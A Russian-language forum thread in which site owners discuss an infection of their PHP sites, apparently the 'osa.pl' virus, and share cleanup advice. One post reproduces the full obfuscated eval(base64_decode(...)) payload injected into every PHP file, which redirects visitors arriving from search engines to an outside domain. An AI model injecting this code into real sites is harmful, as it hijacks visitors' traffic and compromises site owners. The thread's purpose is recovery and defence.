Сегодня сайт не открывается!

12
M8
На сайте с 03.01.2012
Offline
0
#11

у меня в каждом пхп файле вот такая строка! как избавиться от всех строк во всех файлах (их876)

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGFwcHluZXd5ZWFyLjM0NS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));

---------- Добавлено в 00:40 ---------- Предыдущее сообщение было в 00:05 ----------

Народ проверьте!!! vdstom.ru вроде сейчас все должно пахать!!! убрал этот код!!!

---------- Добавлено в 00:41 ---------- Предыдущее сообщение было в 00:40 ----------

Кстати, для того чтобы быстро убрать строчку со всех файлов пользовался прогой http://www.b4soft.ru/b4text/

JungleWeb
На сайте с 04.06.2006
Offline
98
#12

У кого сайты на Joomla, замените index.php в корне и файл includes/defines.php на оригинальные. Возможно, заражены и другие файлы.

Hype.Place (http://hype.place) - место хайпа на всех событиях, баланс в BTC.
I
На сайте с 18.06.2011
Offline
4
#13

ВНИМАНИЕ! Это вирус и называется он osa.pl.☝

Его суть заключается в редиректе трафика из ПС на сайт вируса с целью рекламы.

Резко упал трафик с ПС. Заметил не сразу.

Перелопатил весь сайт, оказалось, что все файлы движка *.php (их больше 50) содержат "левый" код типа eval base64 и у всех одна дата создания файла.

Здесь подробнее о вирусе - http://safesearch.ya.ru/replies.xml?item_no=226

Решение:

переустановка CMS (1 час)

восстановление резервной копии БД у хостера (5 часов)

Альтернативные решения:

Бекап сайта и БД до даты "заражения" вирусом osa.pl🤪

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий